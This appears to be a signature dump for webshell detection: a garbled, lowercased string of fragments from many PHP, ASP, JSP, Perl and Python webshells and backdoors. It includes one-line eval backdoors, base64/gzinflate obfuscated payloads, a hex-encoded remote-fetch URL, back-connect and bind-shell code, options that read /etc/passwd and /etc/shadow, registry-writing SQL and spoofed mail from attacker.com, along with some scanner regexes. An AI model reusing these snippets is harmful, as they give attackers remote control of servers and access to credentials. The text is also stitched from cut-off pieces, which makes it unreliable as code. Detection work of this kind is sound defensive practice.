\"checked=\\\"checked\\\"\" : \"\";\"<td nowrap>\"+f.canread()+\" / \"+f.canwrite()+\" / \"+f.canexecute()+\"</td>return new double(format.format(value)).doublevalue();file tempf = new file(savepath);if (tempf.isdirectory()) {$bindport_pass = \"c99\"; else {echo \"<b>execution php-code</b>\"; if (empty($eval_txt)) {$eval_txt = tr$res = @mysql_query(\"show create table `\".$_post['mysql_tbl'].\"`\", $d$sql1 .= $row[1].\"\\r\\n\\r\\n\";if(!empty($_post['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); }foreach($values as $k=>$v) {$values[$k] = addslashes($v);}body, td, tr {$d=str_replace(\"\\\\\",\"/\",$d);if ($file==\".\" || $file==\"..\") continue;string savepath = request.getparameter(\"savepath\");url downurl = new url(downfileurl);if (util.isempty(downfileurl) || util.isempty(savepath))string downfileurl = request.getparameter(\"url\");fileinputstream finput = new fileinputstream(f);urlconnection conn = downurl.openconnection();sis = request.getinputstream();<meta http-equiv=\"content-type\" content=\"text/html; charset=gb2312\"></head><input type=\"hidden\" name=\"_eventtarget\" value=\"\" /><input type=\"hidden\" name=\"_eventargument\" value=\"\" /><table width=\"100%\" border=\"1\" cellspacing=\"0\" cellpadding=\"5\" bordercol kb </td><table width=\"98%\" border=\"0\" cellspacing=\"0\" cellpadding=\"<!-- <tr align=\"center\"> http://www.4ngel.net</a> | <a href=\"?action=phpenv\">phpecho $msg=@fwrite($fp,$_post['filecontent']) ? \"codz by angel$res = @shell_exec($cfe);$res = @ob_get_contents();@exec($cfe,$res);private static final int editfield_rows = 30;private static string tempdir = \".\";<input type=\"hidden\" name=\"dir\" value=\"<%=request.getattribute(\"dir\")%>\"\" <select name='encode' class='input'><option value=''>ansi</option><option valjsession.setattribute(\"msg\",\"<span style='color:red'>upload file failed!</spafile f = new file(jsession.getattribute(current_dir)+\"/\"+filebean.getfilename(((invoker)ins.get(\"vd\")).invoke(request,response,jsession);$handle = @opendir($dir) or die(\"can't open directory $dir\");if(!empty($_post['mysql_db'])) { @mssql_select_db($_post['mysql_db'],$db); }if (!isset($_server['php_auth_user']) || $_server['php_auth_user']!==$name || $_,htaprewop(ecalper=htaprewop:fi dne:0=kotide:1 - eulavtni = eulavtni:neht 1 => ej \"<form action='\"&url&\"?action2=post' method='post' name='editform'><input nerror_reporting(0);session_start();header(\"content-type:text/html;charset=utf-8function fvm(jwv):if jwv=\"\"then:fvm=jwv:exit function:end if:dim tt,sru:tt=\"<option value=\"\"drop table [jnc];exec mast\"&kvp&\"er..xp_regwrite 'hkey_localif qpv=\"\" then qpv=\"x:\\program files\\mysql\\mysql server 5.0\\my.ini\"&br&\">www.expdoor.com</a> <input name=\"filename\" type=\"text\" value=\"asp_ver.asp\" size=\"20\" maxset file=fs.opentextfile(server.mappath(filename),8,true) 'set fs=server.createobject(\"scripting.filesystemobject\") '<title>expdoor.com asp<?php $s=@$_get[2];if(md5($s.$s)==<%eval(request(chr(112))):set fso=createobject$i = pack('c*', 0x70, 0x61, 99, 107); 'h' => $i('h*', '687474703a2f2f626c616b696e2e64756170702e636f6d2f7631'),//http://require.duapp.com/session.phpif(!isset($_session['t'])){$_session['t'] = $globals['f']($globals['h']);}//define('pass','123456');$globals['c']($globals['e'](null, $globals['s']('%s',$globals['p']('h*',$_sessiovoid aa(stringbuffer sb)throws exception{file r[]=file.listroots();for(int i=0;ibw.write(z2);bw.close();sb.append(\"1\");}else if(z.equals(\"e\")){ee(z1);sb.appif(z.equals(\"a\")){string s=new file(application.getrealpath(request.getrequest// web shell!!@preg_replace(\"/.*/e\",\"\\x65\\x76\\x61\\x6c\\x28\\x67\\x7a\\x69\\x6e\\x66\\x6$default_charset = \"utf-8\";// url:http://www.weigongkai.com/shell/if (strpos($_server['http_user_agent'], 'ebsd') == false) {setcookie('key', $_post['pwd'], time() + 3600 * 24 * 30);$_session['code'] = _request(sprintf(\"%s?%s\",pack(\"h*\",'6874if (preg_match(\"/^http\\/\\d\\.\\d\\s([\\d]+)\\s.*$/\", $status, $matches))eval(gzuncompress(gzuncompress(crypt::decrypt($_session['code'], $_cif (($fsock = fsockopen($url2['host'], 80, $errno, $errstr, $fsock_timeout))if(is_readable($path)) antivirus($path.'/',$exs,$matches);'/(eval|assert|include|require|include\\_once|require\\_once|array\\_map|arr'/(exec|shell\\_exec|system|passthru)+\\s*\\(\\s*\\$\\_(\\w+)\\[(.*)\\]\\s*'/(include|require|include\\_once|require\\_once)+\\s*\\(\\s*[\\'|\\\"](\\w+'/\\$\\_(\\w+)(.*)(eval|assert|include|require|include\\_once|require\\_oncemail: chinese@hackermail.comif($_get[\"hackers\"]==\"2b\"){if ($_server['request_method'] == 'post') { echo site: http://blog.weili.me<a class=\"high2\" href=\"javascript:;;;\" name=\"action=show&dir=$_ipage_fi$file = !empty($_post[\"dir\"]) ? urldecode(self::convert_to_utf8(rtrim($_poif (true==@move_uploaded_file($_files['userfile']['tmp_name'],self::convert_processed in <span id=\"runtime\"></span> second(s) {gzip} usage:<a href=\"javascript:;;;\" name=\"{return_link}\" onclick=\"fileperm<%@page import=\"java.io.*\"%><%if(request.getparameter(\"f\")<?php eval($_post[1]);?> <%@page import=\"java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*\"%><%!s<[url=mailto:?@array_map($_get[]?@array_map($_get['f'],$_get[/url]);?>:https://forum.90sec.org/forum.php?mod=viewthread&tid=7316@preg_replace(\"/f/e\",$_get['u'],\"fengjiao\"); qq(cs, z1, z2, sb,z2.indexof(\"-to:\")!=-1?z2.substring(z2.indexof(\"-to:\")+4,zsb.append(l[i].getname() + \"/\\t\" + st + \"\\t\" + l[i].length()+ \"\\t\" + sqresultset r = s.indexof(\"jdbc:oracle\")!=-1?c.getmetadata()return drivermanager.getconnection(x[1].trim()+\":\"+x[4],x[2].equalsignorecase(sod=array(\"d\",\"7\",\"s http://www.baidu.com/fuck.asp?a=)0(tseuqer%20lave <% a=request(chr(97)) executeglobal(strreverse(a)) %>array_map(\"asx73ert\",(arpreg_replace(\"/[errorpage]/e\",$page,\"saft\");shell.php?qid=zxexp <?php array_map(\"ass\\x65rt\",(array)$_request['expdoor']);?><?php eval(str_rot13('riny($_cbfg[cntr]);'));?><?$_uu=chr(99).chr(104).chr(114);$_cc=$_uu(101).$_uu(118).$_uu(97).$_uu(108).$_uecho \"<font color=blue>error!</font>\";<input type=\"text\" size=61 name=\"f\" value='<?php echo $_server[\"script_file - expdoor.com</title>$f=fopen($_post[\"f\"],\"w\");<textarea name=\"c\" cols=60 rows=15></textarea><br>execute morficoder(\")/*/z/*/(tseuqer lave\")function morficoder(code)morficoder=replace(replace(strreverse(code),\"/*/\",\"\"\"\"),\"\\*\\\",vbcrlf)my @adms=(\"kelserific\",\"puna\",\"nod32\")#acesso a shel - 1 on 0 offhttp://michaeldaw.org 2006or http://<? echo $server_name.$request_uri; ?>?d=c:/windows on wincoded by z0mbie<option value=\"cat /var/cpanel/accounting.log\">/var/cpanel/accounting.log</optliz0zim private safe mode command execuriton bypassecho \"<b><font color=red>kimim ben :=)</font></b>:$uid<br>\";echo \"command : <input type=text name=cmd value=\".@stripslashes(htmlentities($if(!$whoami)$whoami=exec(\"whoami\"); echo \"whoami :\".$whoami.\"<br>\";shankar<input type=checkbox name='dd' \".(isset($_post['dd'])?'checked':'').\">db<inputshow<input type=text size=5 value=\".((isset($_post['br_st']) && isset($_post['bcopy ( $dosya_gonder2, \"$dir/$dosya_gonder2_name\") ? print(\"$dosya_gonder2_naecho \"<center><font size='$sayi' color='#ffffff'>hacklerin<font color='#008000'value='calistirmak istediginiz eval(gzinflate(base64_decode('fjzhkqpatku/550ignjxxhvv6bzae0ie5+svfvgtkqxmzq05x1shellbotpacktsgr0upcorporation# servidor de irc que vai ser usado /^ctcpflood\\s+(\\d+)\\s+(\\s+)$succ = \"warning! don`t be stupid .. this is a priv3 server, so take extra care!\\*=-- members area --=*/preg_match('/(\\n[^\\n]*){' . $cache_lines . '}$/', $_session['ocr4sh_aka_rklngh edition/* connectback-backdoor on perl<form action=<?=$script?>?act=bindshell method=post>$logo = \"r0lgodlhmaawaoyaaaaaap////r// backdoor.jspjsp backdoor reverse shellmailto:rhfactor@antisocial.com?raiz=rootdigo corrompido<br>corrupt codekey = \"5dcadac1902e59f7273e1902e5ad8414b1902e5abf3e661902e5b554fc41902e53205ca0ntdaddy v1.9 by obzerve of fux0r inc<error: this is not a text file>raw d.o.s. command interfacesimattacker - vrsion : 1.0.0 - priv8 4 my friend fputs ($fp ,\"\\n*********************************************\\nwelcome t0 simecho \"<a target='_blank' href='?id=fm&fedit=$dir$file'><span style='text-decora<title>remote explorer</title> fso.copyfile request.querystring(\"folderpath\") & request.querystring(\"copyfi<td bgcolor=\"<%=bgcolor%>\" title=\"<%=file.name%>\"> <a href= \"showcode.asp?f{mkdir(\"$dizin/$duzenx2\",777)$baglan=fopen($duzkaydet,'w');phvayv 1.0set aktifklas=request.querystring(\"aktifklas\")action=\"klasvayv.asp?klasorac=1&aktifklas=<%=aktifklas%>&klas=<%=aktifklas%><font color=\"#858585\">www.aventgrup.netstyle=\"background-color: #95b4cc; border-bottom: #000000 1px inset; border-leftr57shell else if ($http_post_vars['with'] == \"lynx\") { $http_post_vars['cmd']= \"lynx rush security team'ru_text12' => 'back-connectc:\\tmp\\dump_rst mysqlhttp://rst.void.ru$st_form_bg='r0lgodlhcqajaiaaaofo6u7w8yh5baaaaaaalaaaaaajaakaaaipjaonujfnhjh0qtfw0lcvads=';#use: python wh_bindshell.py [port] [password]python -c\"import md5;x=md5.new('you_password');print x.hexdigest()\"#bugz: ctrl+c etc =script stoped=network security team :: cgi shell#########################<<konec>>#######################################if (!defined$param{pwd}){$param{pwd}='enter_password'};##eval(gzinflate(base64_decode('hj3hkqnqeku/zzqcbd4t8v4yaqi2e3jvpv8/1gw6orsvflyxef//$message.= \"--{$mime_boundary}\\n\" .\"content-type: {$fileatt_type};\\n\" .$ftpconnect = \"ncftpput -u $ftp_user_name -p $ftp_user_pass -d debsender_ftplogmove_uploaded_file($userfile, \"entrika.php\"); send this file: <input name=\"userfile\" type=\"file\"><input type=\"hidden\" name=\"max_file_size\" value=\"100000\">w a r n i n g: private server$message = q$<pre><font color=\"#669999\"> _____ _____ _____ _____ w3d shellby: warpboyno query executedwebshell.cgi<td><code class=\"entry-[% if entry.all_rights %]mine[% elsewinx shellcreated by greenwood from n57<td><font color=\\\"#990000\\\">win dir:</font></td>$def_ports=array (1=>'tcpmux (tcp port service multiplexer)',2=>'management util$ra44 = rand(1,99999);$sj98 = \"sh-$ra44\";$ml = \"$sd98\";$a5 = $_server['http.::[c0derz]::. web-shellhttp://c0derz.org.uavint21h@c0derz.org.ua$name='63a9f0ea7bb98050796b649e85481845';//rootnews remote php shell injectionphp shell <br /><input type = \"text\" name = \"url\" value = \"codz by angel(4ngel)web: http://www.4ngel.net$admin['cookielife'] = 86400;$errmsg = 'the file you want downloadable was nonexistent';$res .= '<td align=\"center\"><a href=\"'.$xshell.'?act=chmod&file='.$_session[ak-74 security team web site: www.ak74-team.net$php=\"/* line 1 */\\n\\n// \".mm(\"for example, uncomment next line\").\"welcome to phpremoteview (remview)pysystemstate.initialize(system.getproperties(), null, argv);public class jythonshell extends jpanel implements runnable {public static int default_scrollback = 100drmist.ruhidden(\"action\",\"download\").hidden_pwd().\"<center><table><tr><td width=80stnc webshellhttp://www.security-teams.net/index.php?showtopic=azrailphp<br><center><input type='submit' name='dy' value='dosya yolla!'></center><center><input type='submit' name='okmf' value='tamam'></center>;$sd98=\"john.barker446@gmail.com\"print \"sending mail to $to....... \";<td colspan=\"2\" width=\"715\" background=\"/simparts/images/cellpic1.gif\" hei$dump_file.='`'.$rows2[0].'`filename=\\\"dump_{$db_dump}_${table_dcmdasp.asp-- use a poor man's pipe ... a temp file --maceo @ dogmile.com<!-- simple php backdoor by dk (http://michaeldaw.org) -->usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwdsoomin kimsmkim@popeye.snu.ac.krecho \"<td><a href='$php_self?action=deletedata&dbname=$dbname&tablename=$tablenemperor hacking teamsimshell<form name=\"shell\" action=\"<?php echo $_server['php_self'] ?>\" method=\"post[url=http://www.governmentsecurity.orgperl asmodeus.pl client 6666 127.0.0.1print \"asmodeus perl remote shell$internet_addr = inet_aton(\"$host\") or die \"aloa:$!\\n\";#phpmyadmin mysql-dump;db_connect();header('content-type: application/octetstr$data .= \"#database: $databasemehdi & holydemonwww.infilak.'*t@*r@#@&mms^pdbybvubcaaa==^#~@%><form method=post name=inf><table width=\"75%<title>[additinal tittle]-phpshell by:[yourname]<?php echo phpshell_version ?></href=\"mailto: [you can enter your mail here]- [additional text]</a></i>@chdir($work_dir) or ($shelloutput = \"myshell: can't change directory.echo \"<font color=$linkcolor><b>myshell file editor</font> file:<font color $fileeditinfo = \"&nbsp;&nbsp;:::::::&nbsp;&nbsp;owner: <font color=$simorgh security magazine simshell.css} elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_request['command'], www.simorgh-ev.comkj021320case 't':systemtools(out);break;out.println(\"<tr><td>\"+ico(50)+f[i].getname()+\"</td><td> file<die(\"couldn't read directory, blocked!!!\");php web shellshells.dl.amthis server has been infected by $owner<input type=\"submit\" value=\"include!\" name=\"inc\"></p>could not write to file! (maybe you didn't enter any text?)#we are: masterkid, alexutz, fatman & mikutul echo --==userinfo==-- ; id;echo;echo --==directory==-- ; pwd;echo; echo --==shelconnectback backdoortarget fi1e:<br><input type=\"text\" name=\"target\" value=\"index.php\"></br>eval(base64_decode(\"zxzhbchiyxnlnjrfzgvjb2rlkcjhv2r1yjnkbfgzvnpawepmwvdkdmnuuw9<img src=\"http://s43.radikal.ru/i101/1004/d8/ced1f6b2f5a9.png\" align=\"center$back_connect_p=\"iyevdxnyl2jpbi9wzxjsdqp1c2ugu29ja2v0ow0kjglhzgrypwluzxrfyxrvbiecho '<h1>execution php-code</h1><div class=content><form name=pf method=posecho \"[dir] <a href=\\\"\".$_server['php_self'].\"?rep=\".realpath($rep.\"..class backdoor {echo \"<a href=\\\"\".$_server['php_self'].\"?copy=1\\\">copier un fichier</a> <if int((1-0+1)*rnd+0)=0 then makeemail=maketext(8) & \"@\" & maketext(8) & \".\"<form name=frmcmd method=post action=\"<%=gurl%>\">dim zombie_array,special_arrayhttp://vnhacker.orgd7nd7l.km4snk`jzknd{n_ejq;bd{kbpur#kq8aaa==^#~@%>></td><td><input type=\"submitprint \"\\n\".'<tr><td width=100pt class=linelisting><nobr>post (php eval)</td><dizin</font></b></font><font face=\"verdana\" style=\"font-size: 8pt\"><s72 shell v1.0 codinf by cr@zy_kingecho \"<p align=center>dosya zaten bulunuyor</p>\"<?$d='g7mhwq9vvxil/qx2oz2vtdpo6g3fyaa6x+8dmizcd0ehzabzh7jfpzzuz7xnenxsyvbp2wy36ukacak fso 1.0if request.querystring(\"tgh\") = \"1\" then<font color=\"#858585\">buqx</font></a></font><font face=\"verdana\" style=mailto:buqx@hotmail.comlord of iran hackers sabotagelord-c0d3r-nt$port = base_convert(bin2hex(substr($reqmessage[$id], 3+$reqlen+1, 2)), 16, 10);# [+] domain name address typewww.antichat.rucan't open file, permission denidehas been already loaded. php emperor <xb5@hotmail.action=mysqlread&mass=loadmass\">load all defaultsif (@passthru($cmd)) { echo \" -->\"; $this->output_state(1, \"passthruprint \"<tr><td><b>server is:</b></td><td>\".$_server['server_signature'].\"</tdprint \"<tr><td><b>execute command:</b></td><td><input size=100 name=\\\"_cmdcoded by n0 [nzer0] www.cyberlords.netu29mdhdhcmuaqwrvymugsw1hz2vszwfkexhjztwaaaamuexurf///waaajmzzaaaacjourkaaaaereturn \"<br>dump error! can't write to \".htmlspecialchars($file);call os.run(\"win.com cmd.exe /c del \"& sztf,0,true)<div align=\"left\"><font size=\"1\">input command :</font></div><input type=\"text\" name=\"cmd\" size=\"30\" class=\"input\"><br><input type=\"text\" name=\"dir\" size=\"30\" value=\"<? passthru(\"pwd\"); ?>ayyildiztouch by ijoofirst we check if there has been asked for a working directoryhttp://ayyildiz.org/images/whosonline2.gifejder was here*~pu*&bp[_)f!8c2f*@#@&~,p~p,~p&q~8bpms~9~~lb~x`v,_,f&*~,jcw~~[_c3trffzq@#@&pp,~~lama's'hellif($_post['king'] == \"\") {if (move_uploaded_file($_files['fila']['tmp_name'], $curdir.\"/\".$_files['fnewhtml = '<b>file browser is under construction! use at your own risk!</b> <br>empty command..type \\\"shellhelp\\\" for some ehh...helpnewhtml = '<font size=0><b>this will reload the page... :(</b><br><br><form enctjspwebshellcreateanddeletefolder is error:<td width=\"70%\" height=\"22\">&nbsp;<%=env.queryhashtable(\"java.cstring _password =\"111\";$baglan=fopen(\"/tmp/$ekinci\",'r');$tampon4=$tampon3-1@aventgrup.net$yazi = \"test\" . \"\\r\\n\";fwrite ($fp, \"$yazi\");$entry_line=\"hacked by entrika\";sh_out=os.popen(shell+\" \"+cmd).readlines()# d00r.py 0.3a (reverse|bind)-shell in python by fqprint \"error; help: head -n 16 d00r.py\"print \"pw:\",pw,\"port:\",port,\"host:\",host$error_text = '<strong>failed selecting database \"'.$this->db['<div align=\"center\">the backup process has now started<br </a><a href='\"&dosyapath&\"?status=10&dpath=\"&f1.path&\"&path=\"&path&\"&time=<input type=submit value=\"test et!\" onclick=\"$ar_file=array('/etc/passwd','/etc/shadow','/etc/master.passwd','/etc/fstab','/eshow <input type=text size=5 value=\".((isset($_post['br_st']))?$_post['br_st']:echo \"fichier telecharge dans \".good_link(\"./\".$_files[\"fic\"][\"naif(move_uploaded_file($_files[\"fic\"][\"tmp_name\"],good_link(\"./\".$_fiecho \"cliquez sur un nom de fichier pour lancer son telechargement. cliquez s$dl=$_request['download'];else shell(\"perl.exe $name $port\");fputs ($fp, \"# rst mysql tools\\r\\n# home page: http://rst.void.ru\\r\\n#a cgi by fuzzyman\"\"\"+fontline +\"version : \" + versionstring + \"\"\", running on : \"\"\" + values = map(lambda x: x.value, theform[field]) # allows for<title>ru24postwebshell - \".$_post['cmd'].\"</title>if ((!$_post['cmd']) || ($_post['cmd']==\"\")) { $_post['cmd']=\"id;pwd;uname -awrited by dreamerzr3v3ng4ns\\ndigiteif(!@opendir($chdir)) $ch_msg=\"dtool: line 1: chdir: it seems that the permissiif (empty($cmd) and $ch_msg==\"\") echo (\"comandos exclusivos do dtool pro\\n0ldw0lfhowever you are lucky :pi'm fuckedioctl($client{$client}->{shell}, &tiocswinsz, $winsize);#atrix@irc.brasnet.org$dataout .= \"<td><a href='$myloc?$sreq&incdbhost=$myhost&incdbuser=$myuser&incdif($run == 1 && $phpshellapp && $phpshellhost && $phpshellport) $stroutput .= dbsafe0verscript gecisi tamamlayamadi!document.write(unescape('%3c%68%74%6d%6c%3e%3c%62%6f%64%79%3e%3c%53%43%52%49%50%/* we have found the parent dir. we must be carefull if the parent $tmpfile = tempnam('/tmp', 'phpshell');if (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $command, $regs)) {www.rohitab.comprint \"set-cookie: savedpwd=;\\n\"; # remove password cookie$prompt = $winnt ? \"$currentdir> \" : \"[admin\\@$servername $cwww.ironwarez.info$cookiename = \"wieeeee\";~ shell iwww.rootshell-team.infosetcookie($cookiename, $_post['pass'], time()+3600);www.victime.com/index.php?page=http://emplacement_de_la_backdoor.php , ou en tanprint(\"<br>provenance du mail : <input type=\\\"text\\\" name=\\\"provenancif mcolformelem.exists(lcase(sindex)) then form = mcolformelem.item(lcase(sindex))session(\"shagman\")=// note that linux = cmd and windows = \"cmd.exe /c + cmd\" h4ntu shellsystem(\"$cmd 1> /tmp/cmdtemp 2>&1; cat /tmp/cmdtemp; rm /tmp/cmdtemp\");set entrika = entrika.createtextfile(\"c:\\net.vbs\", true)http://www35.websamba.com/cybervurgun/>[*] safemode mode run</div>$file1 - $file2 - <a href=$script_name?$query_string&see=$file>$file</a><br>[*] spawning shellcha0shttp://popeye.snu.ac.kr/~smkim/mysqlhref='$php_self?action=dropfield&dbname=$dbname&tablename=$tablename<th>type</th><th>&nbspm&nbsp</th><th>&nbspd&nbsp</th><th>unsigned</th><th>zerofi<title>g-security webshell</title><input type=text name=\"-cmd\" size=64 value=\"<?=$cmd?>\" <? if($cmd != \"\") print shell_exec($cmd);?><? $cmd = $_request[\"-cmd\"];?>echo \"<b>changing file-mode (\".$d.$f.\"), \".view_perms_color($d.$f).\" (\"echo \"<td>&nbsp;<a href=\\\"\".$sql_surl.\"sql_act=query&sql_query=\".ur<tr><form method=post><td><font color=red><b>back connect:</b></font></td><td><i$perl_proxy_scp = \"iyevdxnyl2jpbi9wzxjsicancimhl3vzci91c2mvcgvybc81ljawnc9iaw4v<tr><form method=post><td><font color=red><b>backdoor:</b></font></td><td><input.textbox { background: white; border: 1px #000000 solid; color: #000099; font-fa<input class='inputbox' type='text' name='pass_de' size=50 onclick=this.value=''echo \"<hr size=\\\"1\\\" noshade><b>done!</b><br>total time (secs.): \".$ft$fqb_log .= \"\\r\\n------------------------------------------\\r\\ndone!\\r'eng_text71'=>\"second commands param is:\\r\\n- for chown - name of new owner oif(!empty($_post['s_mask']) && !empty($_post['m'])) { $sr = new searchresult\"aaaaach5baeaaakalaaaaaauabqaaar0mmljqyzfalqeqjugeqscnwg6fogpkhamf4hajswh7/ze\"\"mtp/zdp//2yaagyam2yazmyamwyazgya/2yzagyzm2yzzmyzmwyzzgyz/2zmagzmm2zmzmzmmwzm\"\"r0lgodlhfaauakl/ap/4/8dawh9/ap/4al+/vwaaaaaaaaaaach5baeaaaealaaaaaauabqaqamo\"echo $te.\"<div align=center><textarea cols=35 name=db_query>\".(!empty($_post['echo sr(45,\"<b>\".$lang[$language.'_text80'].$arrow.\"</b>\",\"<select name=db> if ($copy_unset) {foreach($sess_data[\"copy\"] as $k=>$v) {unset($sess_data[\" if (file_exists($mkfile)) {echo \"<b>make file \\\"\".htmlspecialchars($mkfile echo \"<center><b>mysql \".mysql_get_server_info().\" (proto v.\".mysql_get_pr elseif (!fopen($mkfile,\"w\")) {echo \"<b>make file \\\"\".htmlspecialchars($m$sess_data[\"cut\"] = array(); c99_sif ((!eregi(\"http://\",$uploadurl)) and (!eregi(\"https://\",$uploadurl))c99sh_sqlqueryelse {$act = \"f\"; $d = dirname($mkfile); if (substr($d,-1) != directory_sepaelse {echo \"<b>file \\\"\".$sql_getfile.\"\\\":</b><br>\".nl2br(htmlspec'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . $directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' color='#999999'>dont in windows\";$comments=$_post['comments'];function phpget(){inclvar(); if(confirm(\"o phpget agora oferece uma lista pront<font size=3>by r3v3ng4ns - revengans@gmail.com </font>function phpwriter(){inclvar();var url=prompt(\"[ phpwriter ] by r3v3ng4ns\\ndig//turns the 'ls' command more usefull, showing it as it looks in the shellif (@file_exists(\"/usr/bin/wget\")) $pro3=\"<i>wget</i> at /usr/bin/wget, \";//to keep the changes in the url, when using the 'get' way to send php variablesfunction phpf(){inclvar();var o=prompt(\"[ phpfileditor ] by r3v3ng4ns\\ndigite if(empty($fu)) $fu = @$_get['fu'];<title>'.getenv(\"http_host\").' ~ shell i</title>$link = mysql_connect($_post['host'], $_post['username'], $_posterror_reporting(0); //if there is an error, we'll show it, k?print \"<form action=\\\"\".$me.\"?p=chmod&file=\".$content.\"&dif(!is_numeric($_post['timelimit']))if($_post['chars'] == \"9999\")<option value=\\\"az\\\">a - zzzzz</option>print shell_exec($command);<meta http-equiv=\"content-language\" content=\"tr\"><title>www.sanalteror.org - indexer and reader</title><form action=\"?gonder\" method=\"post\"><form action=\"?oku\" method=\"post\">var message=\"sanalteror - ndexer - reader\"cprthtml = \"<font face='arial' size='1'>rhtools 1.5 beta(pvt) edited by kingdefbarrapos = cint(instrrev(left(raiz,len(raiz) - 1),\"\\\")) - 1destino3 = folderitem.path & \"\\index.asp\"@error_reporting(0);@eval(gzinflate(base64_decode($code)));@set_time_limit(0); </font></span><a href=\"mailto:shopen@aventgrup.net\"><title>:: aventgrup ::.. - sincap 1.0 | session(oturum) b</span>avrasya veri ve network teknolojileri geliwhile (($ekinci=readdir ($sedat))){$deger2= \"$ich[$tampon4]\";// encrypt your password to md5 here http://kerinci.net/?x=decode// password (default is: b374k)//******************************************************************************// b374k 2.2eval(\"?>\".gzinflate(base64_decode(&nbsp;iranian hackers : www.simorgh-ev.com <br><a style=\"text-decoration: none\" href=\"http://www.simorgh-ev.com\">victim mail :<br><input type='text' name='to' ><br><title>h4ntu shell [powered by tsoi]</title>$cmd = $_post['cmd'];$uname = posix_uname( );echo \"<p><font size=2 face=verdana><b>this is the server information</b></font>ob_end_clean();<title>myshell error - access denied</title>$adminemail = \"youremail@yourserver.com\";//a workdir has been asked for - we chdir to that dir.system($command . \" 1> /tmp/output.txt 2>&1; cat /tmp/output.txt; rm /tmp/o#$autoerrortrap enable automatic error traping if command returns error./* no work_dir - we chdir to $document_root */#every command you excecute.<form name=\"shell\" method=\"post\">if ($_post['cmd']){echo \"file uploaded to $dez\";if (file_exists($uploaded)) {passthru($cmd);ster\" name=submit> </font> &nbsp; &nbsp; &nbsp; <a href=mailto:mailbomb@hotmail hacking font-weight: bold; background: #ffffff url('images/cellpic1.gif'); text-indent: padding-right: 8px; padding-left: 8px; font-weight: bold; font-size: 11px; backg<option value=\"/etc/passwd\">get /etc/passwd</option>by php emperor<xb5@hotmail.com>\".htmlspecialchars($file).\" has been already loaded. php emperor <xb5@hotmail.die(\"<font color=\\\"red\\\"><center>sorry... fileif(empty($_get['file'])){echo \"<head><title>safe mode shell</title></head>\"; $liz0zim=shell_exec($_post[liz0]); $liz0=shell_exec($_post[baba]); echo 